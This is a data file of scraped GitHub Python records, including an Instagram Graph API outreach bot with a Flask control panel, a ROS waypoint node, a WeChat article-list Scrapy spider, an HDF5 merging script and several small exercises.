posts based on specified type and date\n update_global_status(\"Feature undeveloped. Current logic sound.\")\n\n#meetings using air.ai\ndef close_meetings():\n #run once a day \n \n #Get google sheet with numbers\n \n #run air.ai for all numbers not proccessed\n \n #if lead purchased service, fulfill service\n #Service Fulfillment:\n \n #if lead scheduled again, verify booking \n \n #else just mark notes\n \n #mark the messaged as contacted with result, and update control panel\n update_global_status(\"Meetings Closed.\")\n \n\n# Main script to execute the Instagram Graph API workflow\ndef instagram_graph_api_script():\n # Loop for 30 times (Step 7)\n # 7. KPI#1: Search recent posts by hashtag and store data in posts sheets\n for hashtag in hashtags_sheet_data:\n posts_data = search_posts_by_hashtag(hashtag)\n \n # Store relevant data in posts sheet\n if posts_data is not None and 'data' in posts_data:\n for post in posts_data.get('data', []):\n data_to_store = {\n 'media_id': post.get('id'),\n 'timestamp': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'user_id': post.get('user', {}).get('id'),\n 'username': post.get('user', {}).get('username'),\n 'caption': post.get('caption', {}).get('text', '')\n }\n update_google_sheet('posts_sheet', data_to_store)\n # Set date to run again.\n else:\n print(\"Error: No data or invalid data from Instagram API\")\n break\n\n update_global_status(\"Weekly API calls used. Initial prospecting complete.\")\n \n # 8. KPI#2: Process comments and store prospects\n for post_data in posts_sheet_data:\n process_comments(post_data['media_id'], \"keyword\")\n update_global_status(\"Usernames generated. Ready for outreach\")\n \n # 9. KPI#3: Generate comments and mark as contacted, outreach lvl 1\n for username in comment_sheet_data:\n generate_comments_and_mark_contacted(username)\n update_global_status(\"Outreach completed. Stats updated.\")\n \n # 10. KPI#4: 4x a day, get messages from bot account and respond to inquiries\n for _ in range(4):\n check_and_respond_to_dm_inquiries(bots_sheet_data['bot_account'])\n update_global_status(\"Inbox processed.\")\n\n # 11. For each uncontacted username, get two random posts, generate comment on one, and mark follow-up date\n #follow_up_with_usernames(uncontacted_usernames, contacted_usernames)\n\n # 12. Check if any contacted usernames have a follow-up\n # (Implementation depends on your specific logic for follow-ups)\n\n # 13. Post batch of ad posts with TensorFlow model\n #post_ad_posts_with_tensorflow()\n\n # 14. Generate and post story\n #generate_and_post_story()\n\n # 15. Check to see if new comments, posts, or stories need to be scheduled\n #schedule_posts(\"comments\", datetime.now() + timedelta(days=1))\n #schedule_posts(\"posts\", datetime.now() + timedelta(days=2))\n #schedule_posts(\"stories\", datetime.now() + timedelta(days=random.randint(1, 3)))\n \n\n#-------------------------------------------------------------------------------------------------------------------\n# Step 3: Define routes for your control panel\n#-------------------------------------------------------------------------------------------------------------------\n# Define route to display the control panel\n@app.route('/control_panel')\ndef control_panel():\n # Get actual data, e.g., script status, meetings booked, outreach count\n #script_status = \"Off\" # Replace with actual script status\n \n # Get the script status from the session variable\n script_status = session.get('script_enabled', False)\n global_status = session.get('global_status', g_status)\n\n meetings_booked = 0 # Replace with actual data\n outreach_count = outreach_done # Replace with actual data\n return render_template('control_panel.html', script_status=script_status, meetings_booked=meetings_booked, outreach_count=outreach_count, global_status=global_status)\n\n# Example route to update the global status\n@app.route('/update_global_status/')\ndef update_global_status(status):\n # Update the global status\n g_status = status\n print(g_status)\n session['global_status'] = g_status\n return redirect(url_for('control_panel'))\n\n#route to send shutdown signal from control panel \n@app.route('/shutdown', methods=['POST'])\ndef shutdown():\n print(\"Shutting down gracefully...\")\n os.kill(os.getpid(), signal.SIGINT)\n return 'Server shutting down...'\n\n@app.route('/toggle_script', methods=['POST'])\ndef toggle_script():\n global script_enabled # Declare script_enabled as global\n\n # Retrieve the current script status from the session variable\n script_enabled = session.get('script_enabled', False)\n\n # Toggle the script status\n script_enabled = not script_enabled\n \n # Run the script if it's enabled\n if script_enabled:\n instagram_graph_api_script()\n\n # Update the session variable with the new script status\n session['script_enabled'] = script_enabled\n\n return redirect(url_for('control_panel'))\n\n# Example: Function to handle the Dialogflow webhook request\n@app.route('/dialogflow-webhook', methods=['POST'])\ndef dialogflow_webhook():\n req = request.get_json()\n\n # Placeholder code, replace with actual DialogFlow intent handling\n intent = req['queryResult']['intent']['displayName']\n if intent == 'Inquiry':\n # Implement logic for handling the specific intent, send booking link with chat GPT format\n fulfillment_text = 'Your fulfillment text here.'\n else:\n # Handle other intents if needed\n fulfillment_text = 'Default fulfillment text.'\n\n return jsonify({'fulfillmentText': fulfillment_text})\n\n\n# Start the Flask server\nif __name__ == '__main__':\n # Set up a signal handler for graceful shutdown\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n \n app.run(host='0.0.0.0', port=80) # Start the Flask server for DialogFlow request fulfillment\n # Run the Instagram Graph API script\n instagram_graph_api_script()\n","repo_name":"genusglobalinc/aibot_twitter","sub_path":"igbot_v1.py","file_name":"igbot_v1.py","file_ext":"py","file_size_in_byte":20087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20536968055","text":"#! /usr/bin/env python3\n\nimport rospy\nimport actionlib\nimport time \nimport sys\nfrom std_msgs.msg import Float64\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose\n\nfrom bluerov_sim.msg import WaypointAction, WaypointGoal, WaypointResult\n\n\n\n\nclass LawnMower():\n\n def __init__(self):\n\n #sub\n #pub\n #self.WayPub = rospy.Publisher(\"/bluerov/SetWayPoint\", Pose, queue_size=1)\n\n #action \n \n\n self.Max_x = 2\n self.Max_y = 2\n self.ConstDepth = - 1\n\n try:\n result = self.MowTheLawn()\n rospy.loginfo(\"RESULT: \"+str(result.success))\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Move up task interrupted with error: \" + str(sys.stderr))\n \n\n def MowTheLawn(self):\n\n Lawnmower_client = actionlib.SimpleActionClient(\"WayPointActionServer\", WaypointAction)\n\n x = self.Max_x\n y = self.Max_y\n z = self.ConstDepth\n\n result = WaypointResult()\n pose_pub = Pose()\n Lawnmower_client.wait_for_server()\n\n goal = WaypointGoal()\n\n for x in range(-self.Max_x,self.Max_x +1):\n for y in range(-self.Max_y,self.Max_y +1):\n pose_pub.position.x = x\n pose_pub.position.y = y\n pose_pub.position.z = z\n\n goal.waypoint = pose_pub\n print(goal.waypoint)\n\n Lawnmower_client.send_goal(goal)\n\n Lawnmower_client.wait_for_result()\n\n result = Lawnmower_client.get_result()\n\n #self.WayPub.publish(pose_pub)\n #print(x,y,z)\n\n return result\n \n \nif __name__ == \"__main__\":\n rospy.init_node(\"lawnmower\")\n LawnMower()\n rospy.spin()\n\n\n\n\n\n\n\n\n","repo_name":"alxmeen/bluerov_sim_thesis","sub_path":"nodes/LawnMow.py","file_name":"LawnMow.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"29554240670","text":"\"\"\"mobify\n\nDownload a web page (set of web pages) as an e-book.\n\nUsage:\n mobify URL ... [--source=]\n mobify (-h | --help)\n mobify --version\n\nOptions:\n URL Space-separated list of URLs to fetch.\n -h --help Show this screen.\n --source= Force a given source type\n --version Show version.\n\"\"\"\n\nimport logging\n\nfrom docopt import docopt\n\nfrom .errors import MobifyError\nfrom .publisher import Publisher\nfrom .version import version\n\n\ndef main():\n \"\"\" Main entry point for CLI\"\"\"\n logger = logging.getLogger(__name__)\n\n arguments = docopt(__doc__, version='mobify {}'.format(version))\n logger.debug('Options: {}'.format(arguments))\n\n chapters = arguments['URL']\n logger.info('URL: {}'.format(chapters))\n\n try:\n publisher = Publisher(chapters=chapters, source_hint=arguments.get('--source'))\n publisher.publish()\n\n # store urls in the .mobify_history file\n with open('.mobify_history', 'a') as f:\n for url in chapters:\n f.write(url + '\\n')\n\n except MobifyError as ex:\n logger.error('Failed to generate an ebook', exc_info=True)\n\n print(ex)\n exit(2)\n","repo_name":"macbre/mobify","sub_path":"mobify/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5259497726","text":"import numpy as np\n\ndef zero_pad(aux,nk1,nk2,nk3,nfft1,nfft2,nfft3):\n '''\n Pad frequency domain with zeroes, such that any relationship between\n aux[k] and aux[N-k] is preserved.\n\n Arguments:\n aux (ndarray): unpadded frequency domain data\n nk1 (int): current size of aux along axis 0\n nk2 (int): current size of aux along axis 1\n nk3 (int): current size of aux along axis 2\n nfft1 (int): number of zeroes to pad axis 0 by\n nfft1 (int): number of zeroes to pad axis 1 by\n nfft1 (int): number of zeroes to pad axis 2 by\n\n Returns:\n auxp3 (ndarray): padded frequency domain data\n '''\n # post-padding dimensions\n nk1p = nfft1+nk1\n nk2p = nfft2+nk2\n nk3p = nfft3+nk3\n # halfway points\n sk1 = int((nk1+1)/2)\n sk2 = int((nk2+1)/2)\n sk3 = int((nk3+1)/2)\n # parities (even <-> p==1)\n p1 = (nk1 & 1)^1\n p2 = (nk2 & 1)^1\n p3 = (nk3 & 1)^1\n\n # accomodate nfft==0\n if nfft1 == 0: p1 = 0\n if nfft2 == 0: p2 = 0\n if nfft3 == 0: p3 = 0\n\n # first dimension\n auxp1 = np.zeros((nk1,nk2,nk3p),dtype=complex)\n auxp1[:,:,:sk3+p3]=aux[:,:,:sk3+p3]\n auxp1[:,:,nfft3+sk3:]=aux[:,:,sk3:]\n # second dimension\n auxp2 = np.zeros((nk1,nk2p,nk3p),dtype=complex)\n auxp2[:,:sk2+p2,:]=auxp1[:,:sk2+p2,:]\n auxp2[:,nfft2+sk2:,:]=auxp1[:,sk2:,:]\n # third dimension\n auxp3 = np.zeros((nk1p,nk2p,nk3p),dtype=complex)\n auxp3[:sk1+p1,:,:]=auxp2[:sk1+p1,:,:]\n auxp3[nfft1+sk1:,:,:]=auxp2[sk1:,:,:]\n\n # halve Nyquist axes\n if p1:\n auxp3[ sk1,:,:] /= 2\n auxp3[-sk1,:,:] /= 2\n if p2:\n auxp3[:, sk2,:] /= 2\n auxp3[:,-sk2,:] /= 2\n if p3:\n auxp3[:,:, sk3] /= 2\n auxp3[:,:,-sk3] /= 2\n\n return(auxp3)\n\n\ndef zero_pad_float(aux,nk1,nk2,nk3,nfft1,nfft2,nfft3):\n \"\"\" Deprecated. Use zero_pad instead.\n\n Note that this function uses the old padding algorithm, which\n 1) does not (quite) preserve symmetry of DFT for even nk\n 2) puts the zeros in the wrong spot altogether for odd nk...\n Besides that, it only works with real numbers...\n \"\"\"\n # zero padding for FFT interpolation in 3D\n nk1p = nfft1+nk1\n nk2p = nfft2+nk2\n nk3p = nfft3+nk3\n # first dimension\n auxp1 = np.zeros((nk1,nk2,nk3p),dtype=float)\n auxp1[:,:,:int(nk3/2)]=aux[:,:,:int(nk3/2)]\n auxp1[:,:,int(nfft3+nk3/2):]=aux[:,:,int(nk3/2):]\n # second dimension\n auxp2 = np.zeros((nk1,nk2p,nk3p),dtype=float)\n auxp2[:,:int(nk2/2),:]=auxp1[:,:int(nk2/2),:]\n auxp2[:,int(nfft2+nk2/2):,:]=auxp1[:,int(nk2/2):,:]\n # third dimension\n auxp3 = np.zeros((nk1p,nk2p,nk3p),dtype=float)\n auxp3[:int(nk1/2),:,:]=auxp2[:int(nk1/2),:,:]\n auxp3[int(nfft1+nk1/2):,:,:]=auxp2[int(nk1/2):,:,:]\n\n return(auxp3)\n","repo_name":"marcobn/PAOFLOW","sub_path":"src/defs/zero_pad.py","file_name":"zero_pad.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"11317030655","text":"import time\r\n\r\ndef riffel(lista):\r\n result = []\r\n for test in range(0, int(len(lista)/2)):\r\n result.append(lista[test])\r\n result.append(lista[int(test+len(lista)/2)])\r\n \r\n return result\r\n\r\n#lista = []\r\n#antal = int(input(\"Antal kort: \"))\r\n#for temp in range(0, antal):\r\n# lista.append(temp)\r\n\r\n#rifflad = lista\r\n#rifflad = riffel(rifflad)\r\n\r\ncount = 1\r\n\r\nfor antal in range(2, 100, 2):\r\n lista = list(range(antal))\r\n #print(lista)\r\n count = 1\r\n rifflad = riffel(lista)\r\n while rifflad != lista:\r\n count += 1\r\n rifflad = riffel(rifflad)\r\n\r\n print(antal, count)\r\n \r\n","repo_name":"maxbergmark/old-work","sub_path":"GruPDat/Laboration 4/extraextra.py","file_name":"extraextra.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10679153640","text":"\"\"\"add time range columns in tasks table\n\nRevision ID: c5521d5c2307\nRevises: 16128ba515fe\nCreate Date: 2023-01-04 08:40:34.267535\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c5521d5c2307'\ndown_revision = '16128ba515fe'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('tasks', sa.Column('time_range_start', sa.DateTime(timezone=True), nullable=True))\n op.add_column('tasks', sa.Column('time_range_end', sa.DateTime(timezone=True), nullable=True))\n op.alter_column('tasks', 'type', nullable=False)\n\n\ndef downgrade():\n op.alter_column('tasks', 'type', nullable=True)\n op.drop_column('tasks', 'time_range_end')\n op.drop_column('tasks', 'time_range_start')\n","repo_name":"automactic/InstaArchiver","sub_path":"app/alembic/versions/c5521d5c2307_add_time_range_columns_in_tasks_table.py","file_name":"c5521d5c2307_add_time_range_columns_in_tasks_table.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"34451721917","text":"from django.shortcuts import render\nfrom .forms import FeedbackForm\n\n# Create your views here.\n\ndef home_view(request):\n context = {}\n return render(request, 'index.html',context)\n\n\ndef feedback_form(request):\n form = FeedbackForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = FeedbackForm()\n context = {\n 'form' : form\n }\n return render(request, 'forms.html', context)\n","repo_name":"swikritiss/Feedback-Form","sub_path":"myprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"498178897","text":"from PyQt5.QtCore import QObject, pyqtSignal\n\nfrom pathlib import Path\nimport parametros as p\n\nclass LogicaRanking(QObject):\n\n senal_abrir_inicio = pyqtSignal()\n senal_lista_puntajes = pyqtSignal(list)\n\n def __init__(self):\n super().__init__()\n self.top5_puntajes = []\n\n self.crear_archivo_puntajes()\n self.lista_mejores_puntajes()\n\n #Funcion para crear puntajes.txt si no existe\n #https://appdividend.com/2021/06/03/how-to-create-file-if-not-exists-in-python/\n def crear_archivo_puntajes(self):\n existe_archivo_puntajes = Path(\"backend\", \"puntajes.txt\")\n existe_archivo_puntajes.touch(exist_ok=True)\n\n #Ordena en una lista a los cinco mejores puntajes\n def lista_mejores_puntajes(self):\n lista_puntajes = []\n\n with open(Path(\"backend\", \"puntajes.txt\"), \"r\", encoding=\"UTF-8\") as archivo:\n\n for linea in archivo.readlines():\n tupla_nombre_puntaje = tuple(linea.strip().split(\",\"))\n lista_puntajes.append(tupla_nombre_puntaje)\n\n lista_puntajes.sort(key=lambda puntaje: puntaje[1], reverse=True)\n self.top5_puntajes = lista_puntajes[:5]\n\n #Manda la senal para volver a la ventana de inicio\n def abrir_inicio(self):\n self.senal_abrir_inicio.emit()\n\n #Manda la lista de puntajes a ventana de ranking\n def mandar_puntajes(self):\n self.senal_lista_puntajes.emit(self.top5_puntajes)\n\n #Se encarga de actualizar la data de los ranking\n #cuando un jugador pierde o no quiere seguir jugando\n def actualizar_data_ranking(self, nuevo_nombre_puntaje):\n lista_puntajes = []\n with open(Path(\"backend\", \"puntajes.txt\"), \"r\", encoding=\"UTF-8\") as archivo:\n for linea in archivo.readlines():\n tupla_nombre_puntaje = tuple(linea.strip().split(\",\"))\n lista_puntajes.append(tupla_nombre_puntaje)\n\n lista_nombres = [nombre_puntaje[0] for nombre_puntaje in lista_puntajes]\n if nuevo_nombre_puntaje[0] not in lista_nombres:\n lista_puntajes.append(nuevo_nombre_puntaje)\n else:\n for index, nombre_puntaje in enumerate(lista_puntajes):\n if nuevo_nombre_puntaje[0] == nombre_puntaje[0]:\n if tupla_nombre_puntaje[1] > nombre_puntaje[1]:\n lista_puntajes[index] = nuevo_nombre_puntaje\n\n with open(Path(\"backend\", \"puntajes.txt\"), \"w\", encoding=\"UTF-8\") as archivo:\n for tupla_nombre_puntaje in lista_puntajes:\n archivo.write(f\"{tupla_nombre_puntaje[0]},{tupla_nombre_puntaje[1]}\\n\")\n\n\n\n\n\n\n\n","repo_name":"nicoabarca/progra_avanzada","sub_path":"Tareas/T2/backend/logica_ranking.py","file_name":"logica_ranking.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30204596588","text":"#!/bin/sh /cvmfs/icecube.opensciencegrid.org/py2-v3.0.1/icetray-start\n#METAPROJECT: simulation/V06-01-00-RC4\n\nimport numpy as np\nimport h5py\nimport glob\nimport argparse\nimport sys\n\ndef get_file_entries(filename):\n f = h5py.File(filename, 'r')\n return len(f[\"weights\"])\n f.close()\n del f\n\ndef check_reco(filename):\n f = h5py.File(filename, 'r')\n return (\"reco\" in f.keys())\n f.close()\n del f\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input_files\", type=str, default=None,\n dest=\"input_files\", help=\"name for input files\")\nparser.add_argument(\"-o\", \"--output_file\", type=str, default=None,\n dest=\"output_file\", help=\"name for output file\")\nargs = parser.parse_args()\n\n#filenames = sorted(glob.glob(\"/mnt/scratch/priesbr1/Processed_Files/NuMu_140000_??????_level2_sim6.hdf5\"))\n#filenames = sorted(glob.glob(\"/mnt/home/f0008480/IceCUBE/Level5p_IC86.2013_genie_numu.014640.??????.hdf5\"))\n#filenames = sorted(glob.glob(\"/mnt/scratch/f0008480/Processed_Files/14640/Level5p_IC86.2013_genie_numu.014640.??????.hdf5\"))\n#filenames = sorted(glob.glob(\"/mnt/scratch/f0008480/Processed_Files/Simulation/Second_Run/NuE_120000_0000??_level2.hdf5\"))\n#filenames = ['outfile_sim_jessie_run1.hdf5', 'outfile_sim_jessie_run2.hdf5', 'outfile_sim_run2.hdf5']\n#outfilename = \"/mnt/scratch/priesbr1/Processed_Files/NuMu_level2_sim6.hdf5\"\n\nfilenames = sorted(glob.glob(args.input_files))\noutfilename = args.output_file\n\nnp.set_printoptions(threshold=sys.maxsize)\n\nreco = False\nentries_per_file = []\nfor filename in filenames:\n print(\"checking {}\".format(filename))\n entries_per_file.append(get_file_entries(filename))\n if not reco:\n reco = check_reco(filename)\ntotal_entries = sum(entries_per_file)\nprint(\"total entries: {}\".format(total_entries))\n\nf = h5py.File(outfilename, 'w')\ngrp_features = f.create_group(\"features\")\ngrp_labels = f.create_group(\"labels\")\nif reco:\n grp_reco = f.create_group(\"reco\")\n\n# create arrays from template\nf_template = h5py.File(filenames[0], 'r')\n\nlabel_keys = list(f_template[\"labels\"].keys())\nfeature_keys = list(f_template[\"features\"].keys())\nif \"reco\" in f_template:\n reco_keys = list(f_template[\"reco\"].keys())\n\nout_features = dict()\nout_labels = dict()\nif \"reco\" in f_template:\n out_reco = dict()\n\nfor k in label_keys:\n out_labels[k] = np.array([])\nfor k in feature_keys:\n out_features[k] = np.array([])\nif \"reco\" in f_template:\n for k in reco_keys:\n out_reco[k] = np.array([])\nout_weights = np.array([])\n\nf_template.close()\ndel f_template\n\n# get minimum number of entries in files\nmin_entries = min(entries_per_file)\nprint(\"Minimum number of entries in all files:\", min_entries)\n\n# read data from input files\ncurrent_entry = 0\nfile_energies = []\nfile_cascades = []\nfile_time_lists = []\nfor filename in filenames:\n f_input = h5py.File(filename, 'r')\n entries = len(f_input[\"weights\"])\n\n if entries == 0:\n continue\n\n # generate random numbers for checking\n save_length = np.random.randint(5,20)\n save_index = np.random.randint(0,min_entries-(save_length+1))\n\n print(\"reading input file {} with {} entries\".format(filename, entries))\n\n out_weights = np.concatenate((out_weights, f_input[\"weights\"][:]))\n for k in label_keys:\n out_labels[k] = np.concatenate((out_labels[k], f_input[\"labels\"][k][:]))\n for k in feature_keys:\n out_features[k] = np.concatenate((out_features[k], f_input[\"features\"][k][:]))\n if \"reco\" in f_input:\n for k in reco_keys:\n out_reco[k] = np.concatenate((out_reco[k], f_input[\"reco\"][k][:]))\n\n test_energies = np.array(f_input[\"labels\"][\"energy\"][save_index:save_index+save_length])\n file_energies.append(test_energies)\n test_cascades = np.array(f_input[\"labels\"][\"isCascade\"][save_index:save_index+save_length])\n file_cascades.append(test_cascades)\n test_times = np.array(f_input[\"features\"][\"pulse_time\"][save_index])\n file_time_lists.append(test_times)\n \n f_input.close()\n del f_input\n\n current_entry += entries\n\nif current_entry != len(out_weights):\n raise RuntimeError(\"Unexpected number of events -- got %i, expected %i\"%(current_entry, len(out_weights)))\n\nfor k in label_keys:\n grp_labels.create_dataset(k, data=out_labels[k])\nprint(\"Finished creating labels\")\nfor k in feature_keys:\n dt = h5py.special_dtype(vlen=out_features[k][0].dtype)\n dset = grp_features.create_dataset(k, (len(out_features[k]), ), dtype=dt)\n for i in range(len(out_features[k])):\n dset[i] = out_features[k][i]\nprint(\"Finished creating features\")\nif reco:\n for k in reco_keys:\n grp_reco.create_dataset(k, data=out_reco[k])\nprint(\"Finished creating reco\")\ngrp_weights = f.create_dataset(\"weights\", data=out_weights)\nprint(\"Finished creating weights\")\n\nf.close()\nprint(' ')\n\n# check for concatenation errors\ndef isSubArray(long_array, short_array):\n i = 0\n j = 0\n m = len(long_array)\n n = len(short_array)\n\n max_match = 0\n match = 0\n\n if type(long_array[0]) != np.ndarray:\n while i < m and j < n:\n if long_array[i] == short_array[j]:\n i += 1\n j += 1\n match += 1\n if match > max_match:\n max_match = int(match)\n\n if j == n:\n return True\n\n else:\n i = i - j + 1\n j = 0\n match = 0\n\n if i == m:\n print(\"Longest match:\", max_match)\n return False\n\n else:\n done_return = False\n for k, sub_array in enumerate(long_array):\n p = len(sub_array)\n while i < p and j < n:\n if sub_array[i] == short_array[j]:\n i += 1\n j += 1\n match += 1\n if match > max_match:\n max_match = int(match)\n\n if j == n:\n done_return = True\n return True\n\n else:\n if match > 0:\n print(match)\n i = 0\n j = 0\n match = 0\n break \n \n if not done_return:\n print(\"Longest match:\", max_match)\n return False\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n f_input = h5py.File(filename, 'r')\n energies = f_input[\"labels\"][\"energy\"][:]\n bool_array.append(isSubArray(energies, file_energies[i]))\n f_input.close()\n del f_input\n\nfor i in range(len(bool_array)):\n print(\"Kept regression labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Regression label information not kept from all files\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n f_input = h5py.File(filename, 'r')\n cascades = f_input[\"labels\"][\"isCascade\"][:]\n bool_array.append(isSubArray(cascades, file_cascades[i]))\n f_input.close()\n del f_input\n\nfor i in range(len(bool_array)):\n print(\"Kept classification labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Classification label information not kept from all files\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n f_input = h5py.File(filename, 'r')\n time_lists = f_input[\"features\"][\"pulse_time\"][:]\n bool_array.append(isSubArray(time_lists, file_time_lists[i]))\n f_input.close()\n del f_input\n\nfor i in range(len(bool_array)):\n print(\"Kept features from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Feature information not kept from all files\")\n\nf = h5py.File(outfilename, \"r\")\nprint(f.keys())\nout_energies = f[\"labels\"][\"energy\"][:]\nout_cascades = f[\"labels\"][\"isCascade\"][:]\nout_time_lists = f[\"features\"][\"pulse_time\"][:]\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n bool_array.append(isSubArray(out_energies, file_energies[i]))\nfor i in range(len(bool_array)):\n print(\"Found outfile regression labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Regression label information not found in outfile\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n bool_array.append(isSubArray(out_cascades, file_cascades[i]))\nfor i in range(len(bool_array)):\n print(\"Found outfile classification labels from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Classification label information not found in outfile\")\n\nbool_array = []\nfor i, filename in enumerate(filenames):\n bool_array.append(isSubArray(out_time_lists, file_time_lists[i]))\nfor i in range(len(bool_array)):\n print(\"Found outfile features from %s: %s\"%(filenames[i], bool_array[i]))\nif False in bool_array:\n raise RuntimeError(\"Feature information not found in outfile\")\n\nf.close()\ndel f\n","repo_name":"priesbr1/Upgrade_RNN","sub_path":"combine_hdf5.py","file_name":"combine_hdf5.py","file_ext":"py","file_size_in_byte":8964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14098557896","text":"class Solution(object):\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n \n min_len = len(strs[0])\n if len(strs)==0 :\n return \"\";\n \n if len(strs)!=0:\n for i in range (1,len(strs)):\n min_len = min(min_len,len(strs[i]))\n # return min_len\n \n prefix = \"\"\n \n for i in range (0, min_len):\n for j in range (1, len(strs)):\n if strs[0][i]!=strs[j][i]:\n return prefix\n # break\n prefix +=strs[0][i] \n \n return prefix\n\n ","repo_name":"wooddada/LeetCode","sub_path":"0014-longest-common-prefix/0014-longest-common-prefix.py","file_name":"0014-longest-common-prefix.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16807960804","text":"import scrapy\nfrom scrapy.http import Request\nfrom crawler.crawler.utils import get_global_settings\nfrom crawler.crawler.items.load_more import LoadMoreItem\nfrom crawler_assist.tidy_req_data import TidyReqData\nfrom ui import gc\n\n\nclass ArticleListSpider(scrapy.Spider):\n name = 'article_list'\n allowed_domains = ['mp.weixin.qq.com']\n start_url = []\n custom_settings = get_global_settings()\n wx_num,_,_ = TidyReqData.get_gzh_req_data()\n if wx_num == 0:\n wx_num = 1\n custom_settings['DOWNLOAD_DELAY'] = round(2.0/wx_num,2)\n custom_settings['ITEM_PIPELINES'] = {\n 'crawler.crawler.pipelines.load_more.ResponseArticleListPipeline': 300,\n }\n custom_settings['DOWNLOADER_MIDDLEWARES'] = {\n 'crawler.crawler.middlewares.load_more.LoadMoreMiddleware': 543,\n }\n counter = 0\n list_offset = 0\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n :param args:\n :param kwargs:\n 实例化爬虫需要调用的函数\n \"\"\"\n self.current_nickname = ''\n\n def start_requests(self):\n \"\"\"\n :return:重新爬虫的入口函数, 否者直接请求start_urls中的各个url\n 重写之后手动调用Request并指定回调函数例如self.parse\n \"\"\"\n yield Request(url='http://www.aii.com',\n meta={\"list_offset\":self.list_offset} ,\n callback=self.parse, dont_filter=True)\n\n def parse(self, response):\n \"\"\"\n :param response:\n :return:请求完成之后的回调函数\n \"\"\"\n self.counter += 1\n cmc = response.get_ext_data['can_msg_continue']\n next_offset = response.get_ext_data['next_offset']\n item = LoadMoreItem()\n item['article_list'] = response.get_ext_data['data']\n item['nickname'] = response.get_ext_data['nickname']\n self.current_nickname = response.get_ext_data['nickname']\n gc.report_crawling({'nickname':item['nickname'],\n 'percent':'UNK',\n 'more':cmc,\n 'title':len(item['article_list'])})\n yield item\n if cmc == 1:\n yield Request(url='http://www.aii.com',\n meta={\"list_offset\":next_offset} ,\n callback=self.parse, dont_filter=True)\n\n def close(self, reason):\n \"\"\"\n :param reason:\n :return:所有url请求完毕之后关闭爬虫的回调函数\n \"\"\"\n # 删除被删除的公众号 被删除的公众号content_url为空\n from db import delete\n delete(self.current_nickname, content_url=\"\")\n print(self.name,\"爬虫关闭\")\n","repo_name":"54xingzhe/weixin_crawler","sub_path":"project/crawler/crawler/spiders/article_list.py","file_name":"article_list.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":416,"dataset":"github-code","pt":"61"} +{"seq_id":"23110953606","text":"import unittest\r\n\r\n\r\ndef validate_battlefield(battlefield):\r\n poss = [[], [], [], []] # first contains possible 1 positions, second 2 positions, third 3 , fourth 4 positions\r\n points = set()\r\n for i in range(10):\r\n for j in range(10):\r\n if battlefield[i][j] == 1:\r\n points.add((i, j))\r\n poss[0].append((i, j))\r\n\r\n # find vertical length\r\n v = 1\r\n while v < 4 and i + v < 10:\r\n if battlefield[i + v][j] == 1:\r\n poss[v].append([(k, j) for k in range(i, i+v+1)])\r\n else: break\r\n v += 1\r\n\r\n # find horizontal length\r\n h = 1\r\n while h < 4 and j + h < 10:\r\n if battlefield[i][j + h] == 1:\r\n poss[h].append([(i, k) for k in range(j, j+h+1)])\r\n else: break\r\n h += 1\r\n\r\n # quick false checks\r\n if len(points) != 20: return False\r\n if not all(ship_group for ship_group in poss): return False\r\n\r\n # test for possible\r\n return scan_possible(set(), 3, 1, 0, poss)\r\n\r\n\r\ndef scan_possible(visited, ship_type, ship_num, start, poss):\r\n for b in range(start, len(poss[ship_type])):\r\n if ship_type == 3:\r\n result = scan_possible(set(poss[ship_type][b]), 2, 1, 0, poss)\r\n if result: return result\r\n elif all(c not in visited for c in poss[ship_type][b]):\r\n if ship_type == 0 and ship_num == 4:\r\n return True\r\n elif ship_type == 1 and ship_num == 3:\r\n if scan_possible(visited.union(poss[ship_type][b]), 0, 1, 0, poss): return True\r\n elif ship_type == 2 and ship_num == 